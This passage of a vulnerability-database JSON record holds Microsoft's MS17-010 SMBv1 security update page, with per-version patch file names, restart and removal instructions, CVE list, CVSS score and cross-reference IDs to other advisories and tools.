</p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. 
</p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012214\"><u>Microsoft Knowledge Base article 4012214</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012217\"><u>Microsoft Knowledge Base article 4012217</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012216\"><u>Microsoft Knowledge Base article 4012216</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 10 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"30%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10:<br/><span><strong><span>Windows10.0-KB4012606-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10 Version 1511:<br/><span><strong><span>Windows10.0-KB4013198-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10 Version 1607:<br/><span><strong><span>Windows10.0-KB4013429-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"30%\"><p><strong>Restart requirement</strong></p></td> 
<td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"30%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"30%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p><span>See </span><a href=\"https://support.microsoft.com/en-sg/help/12387/windows-10-update-history\" target=\"_self\"><span><u>Windows 10 and Windows Server 2016 update history</u></span></a><span>. </span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows Server 2016 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"30%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2016:<br/><span><strong><span>Windows10.0-KB4013429-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"30%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. 
</p></td> </tr><tr> <td width=\"30%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"30%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p><span>See </span><a href=\"https://support.microsoft.com/en-sg/help/12387/windows-10-update-history\" target=\"_self\"><span><u>Windows 10 and Windows Server 2016 update history</u></span></a><span>. </span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table></span><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a 
href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "published": "2017-03-14T00:00:00", "modified": "2017-03-14T17:40:20", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://support.microsoft.com/en-us/help/4013389/", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2021-01-01T22:39:28", "history": [{"bulletin": {"bulletinFamily": "microsoft", "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "description": "<html><body><p>Resolves a vulnerability in Windows that could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.</p><h2>Summary</h2><div class=\"kb-summary-section section\">This security update resolves vulnerabilities in Microsoft Windows. The most severe of the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server.<br/>To learn more about the vulnerability, see <a href=\"https://technet.microsoft.com/library/security/MS17-010\" id=\"kb-link-2\" target=\"_self\">Microsoft Security Bulletin MS17-010</a>. 
</div><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><span class=\"text-base\">Important </span><ul class=\"sbody-free_list\"><li>All future security and non-security updates for Windows RT 8.1, Windows 8.1, and Windows Server 2012 R2 require update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-3\" target=\"_self\">2919355</a> to be installed. We recommend that you install update <a href=\"https://support.microsoft.com/en-us/help/2919355\" id=\"kb-link-4\" target=\"_self\">2919355</a> on your Windows RT 8.1-based, Windows 8.1-based, or Windows Server 2012 R2-based computer so that you receive future updates. </li><li>If you install a language pack after you install this update, you must reinstall this update. Therefore, we recommend that you install any language packs that you need before you install this update. For more information, see <a href=\"https://technet.microsoft.com/en-us/library/hh825699\" id=\"kb-link-5\" target=\"_self\">Add language packs to Windows</a>. </li></ul></div><h2>Additional information about this security update</h2><div class=\"kb-moreinformation-section section\"><br/><div>The following articles contain more information about this security update as it relates to individual product versions. These articles may contain known issue information. 
</div><br/><br/><ul id=\"info1_list1\"><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012598\" managed-link=\"\" target=\"\"> 4012598</a> MS17-010: Description of the security update for Windows SMB Server: March 14, 2017</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012216\" managed-link=\"\" target=\"\"> 4012216</a> March 2017 Security Monthly Quality Rollup for Windows 8.1 and Windows Server 2012 R2</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012213\" managed-link=\"\" target=\"\"> 4012213</a> March 2017 Security Only Quality Update for Windows 8.1 and Windows Server 2012 R2</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012217\" managed-link=\"\" target=\"\"> 4012217</a> March 2017 Security Monthly Quality Rollup for Windows Server 2012</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012214\" managed-link=\"\" target=\"\"> 4012214</a> March 2017 Security Only Quality Update for Windows Server 2012</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012215\" managed-link=\"\" target=\"\"> 4012215</a> March 2017 Security Monthly Quality Rollup for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012212\" managed-link=\"\" target=\"\"> 4012212</a> March 2017 Security Only Quality Update for Windows 7 SP1 and Windows Server 2008 R2 SP1</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4013429\" managed-link=\"\" target=\"\"> 4013429</a> March 13, 2017\u2014KB4013429 (OS Build 933)</li><li><a bookmark-id=\"\" 
data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4012606\" managed-link=\"\" target=\"\"> 4012606</a> March 14, 2017\u2014KB4012606 (OS Build 17312)</li><li><a bookmark-id=\"\" data-content-id=\"\" data-content-type=\"\" href=\"http://support.microsoft.com/kb/4013198\" managed-link=\"\" target=\"\"> 4013198</a> March 14, 2017\u2014KB4013198 (OS Build 830)</li></ul></div><h2>Security update deployment</h2><span><h3><strong>Windows Vista (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"26%\"><p><strong>Security update file names</strong></p></td> <td width=\"73%\"><p>For all supported 32-bit editions of Windows Vista:<br/><strong>Windows6.0-KB4012598-x86.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported x64-based editions of Windows Vista:<br/><strong>Windows6.0-KB4012598-x64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p><strong>Installation switches</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><span><u>Microsoft Knowledge Base article 934307</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Restart requirement</strong></p></td> <td width=\"73%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"26%\"><p><strong>Removal information</strong></p></td> <td width=\"73%\"><p>WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <strong>Control Panel</strong>, and then click <strong>Security</strong>. Under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. 
</p></td> </tr><tr> <td width=\"26%\"><p><strong>File information</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/4012598\"><span><u>Microsoft Knowledge Base article 4012598</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Registry key verification</strong></p></td> <td width=\"73%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p>\u00a0</p><h3><strong>Windows Server 2008 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"26%\"><p><strong>Security update file names</strong></p></td> <td width=\"73%\"><p>For all supported 32-bit editions of Windows Server 2008:<br/><strong>Windows6.0-KB4012598-x86.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported x64-based editions of Windows Server 2008:<br/><strong>Windows6.0-KB4012598-x64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p>\u00a0</p></td> <td width=\"73%\"><p>For all supported Itanium-based editions of Windows Server 2008<br/><strong>Windows6.0-KB4012598-ia64.msu</strong></p></td> </tr><tr> <td width=\"26%\"><p><strong>Installation switches</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><span><u>Microsoft Knowledge Base article 934307</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Restart requirement</strong></p></td> <td width=\"73%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"26%\"><p><strong>Removal information</strong></p></td> <td width=\"73%\"><p>WUSA.exe does not support uninstall of updates. To uninstall an update installed by WUSA, click <strong>Control Panel</strong>, and then click <strong>Security</strong>. 
Under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"26%\"><p><strong>File information</strong></p></td> <td width=\"73%\"><p>See <a href=\"https://support.microsoft.com/kb/4012598\"><span><u>Microsoft Knowledge Base article 4012598</u></span></a></p></td> </tr><tr> <td width=\"26%\"><p><strong>Registry key verification</strong></p></td> <td width=\"73%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 7 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 7:<br/><strong>Windows6.1-KB4012212-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 7:<br/><strong>Windows6.1-KB4012215-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a><span><u> </u></span></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. 
</p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall </strong>setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, and then under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012212\"><u>Microsoft Knowledge Base article 4012212</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012215\"><u>Microsoft Knowledge Base article 4012215</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows Server 2008 R2 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. 
</p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows Server 2008 R2:<br/><strong>Windows6.1-KB4012212-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows Server 2008 R2:<br/><strong>Windows6.1-KB4012215-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, and then under \"Windows Update,\" click <strong>View installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012212\"><u>Microsoft Knowledge Base article 4012212</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012215\"><u>Microsoft Knowledge Base article 4012215</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. 
</p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 8.1 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 8.1:<br/><strong>Windows8.1-KB4012213-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 8.1:<br/><strong>Windows8.1-KB4012216-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. 
</p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012216\"><u>Microsoft Knowledge Base article 4012216</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows RT 8.1 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Deployment</strong></p></td> <td width=\"71%\"><p>The 4012216 monthly rollup update is available via <a href=\"http://go.microsoft.com/fwlink/?LinkId=21130\"><u>Windows Update</u></a> only. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"71%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"71%\"><p>Click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"71%\"><p>See <a href=\"https://support.microsoft.com/kb/4012216\"><u>Microsoft Knowledge Base article 4012216</u></a> (the monthly rollup delivered to Windows RT 8.1 via Windows Update, as stated under Deployment above)</p></td> </tr> </tbody></table><h3><strong>Windows Server 2012 and Windows Server 2012 R2 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. 
</p><table class=\"table\"><tbody><tr> <td width=\"29%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012:<br/><strong>Windows8-RT-KB4012214-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012:<br/><strong>Windows8-RT-KB4012217-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012 R2:<br/><strong>Windows8.1-KB4012213-x64.msu</strong><br/>Security only</p></td> </tr><tr> <td width=\"29%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2012 R2:<br/><strong>Windows8.1-KB4012216-x64.msu</strong><br/>Monthly rollup</p></td> </tr><tr> <td width=\"29%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"29%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. 
</p></td> </tr><tr> <td width=\"29%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/4012214\"><u>Microsoft Knowledge Base article 4012214</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012217\"><u>Microsoft Knowledge Base article 4012217</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012213\"><u>Microsoft Knowledge Base article 4012213</u></a><br/>See <a href=\"https://support.microsoft.com/kb/4012216\"><u>Microsoft Knowledge Base article 4012216</u></a></p></td> </tr><tr> <td width=\"29%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows 10 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"30%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10:<br/><span><strong><span>Windows10.0-KB4012606-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10 Version 1511:<br/><span><strong><span>Windows10.0-KB4013198-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p>\u00a0</p></td> <td width=\"70%\"><p>For all supported x64-based editions of Windows 10 Version 1607:<br/><span><strong><span>Windows10.0-KB4013429-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"30%\"><p><strong>Restart requirement</strong></p></td> 
<td width=\"70%\"><p>A system restart is required after you apply this security update. </p></td> </tr><tr> <td width=\"30%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"30%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p><span>See </span><a href=\"https://support.microsoft.com/en-sg/help/12387/windows-10-update-history\" target=\"_self\"><span><u>Windows 10 and Windows Server 2016 update history</u></span></a><span>. </span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table><p><span lang=\"EN\"> </span></p><h3><strong>Windows Server 2016 (all editions)</strong></h3><p><strong>Reference table</strong></p><p>The following table contains the security update information for this software. </p><table class=\"table\"><tbody><tr> <td width=\"30%\"><p><strong>Security update file name</strong></p></td> <td width=\"70%\"><p>For all supported editions of Windows Server 2016:<br/><span><strong><span>Windows10.0-KB4013429-x64.msu</span></strong></span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Installation switches</strong></p></td> <td width=\"70%\"><p>See <a href=\"https://support.microsoft.com/kb/934307\"><u>Microsoft Knowledge Base article 934307</u></a></p></td> </tr><tr> <td width=\"30%\"><p><strong>Restart requirement</strong></p></td> <td width=\"70%\"><p>A system restart is required after you apply this security update. 
</p></td> </tr><tr> <td width=\"30%\"><p><strong>Removal information</strong></p></td> <td width=\"70%\"><p>To uninstall an update installed by WUSA, use the <strong>/Uninstall</strong> setup switch or click <strong>Control Panel</strong>, click <strong>System and Security</strong>, click <strong>Windows Update</strong>, and then under \"See also,\" click <strong>Installed updates</strong> and select from the list of updates. </p></td> </tr><tr> <td width=\"30%\"><p><strong>File information</strong></p></td> <td width=\"70%\"><p><span>See </span><a href=\"https://support.microsoft.com/en-sg/help/12387/windows-10-update-history\" target=\"_self\"><span><u>Windows 10 and Windows Server 2016 update history</u></span></a><span>. </span></p></td> </tr><tr> <td width=\"30%\"><p><strong>Registry key verification</strong></p></td> <td width=\"70%\"><p><strong>Note</strong> A registry key does not exist to validate the presence of this update. </p></td> </tr> </tbody></table></span><h2>More Information</h2><div class=\"kb-moreinformation-section section\"><div class=\"faq-section\" faq-section=\"\"><div class=\"faq-panel\"><div class=\"faq-panel-heading\" faq-panel-heading=\"\"><span class=\"link-expand-image\"><span class=\"faq-chevron win-icon win-icon-ChevronUpSmall\"></span></span><span class=\"bold btn-link link-expand-text\"><span class=\"bold btn-link\">How to obtain help and support for this security update</span></span></div><div class=\"faq-panel-body\" faq-panel-body=\"\"><span><div class=\"kb-collapsible kb-collapsible-collapsed\">Help for installing updates: <a href=\"https://support.microsoft.com/ph/6527\" id=\"kb-link-15\" target=\"_self\">Windows Update FAQ</a><br/><br/>Security solutions for IT professionals: <a href=\"https://technet.microsoft.com/security/bb980617.aspx\" id=\"kb-link-16\" target=\"_self\">TechNet Security Support and Troubleshooting</a><br/><br/>Help for protecting your Windows-based computer from viruses and malware: <a 
href=\"https://support.microsoft.com/contactus/cu_sc_virsec_master\" id=\"kb-link-17\" target=\"_self\">Microsoft Secure</a><br/><br/>Local support according to your country: <a href=\"https://www.microsoft.com/en-us/locale.aspx\" id=\"kb-link-18\" target=\"_self\">International Support</a></div><br/></span></div></div></div><a class=\"bookmark\" id=\"fileinfo\"></a></div></body></html>", "enchantments": {"dependencies": {"modified": "2019-09-11T12:33:22", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"], "type": "metasploit"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SECURELIST:9E27BB3C9444305AA7FFD267587363A1"], "type": "securelist"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", 
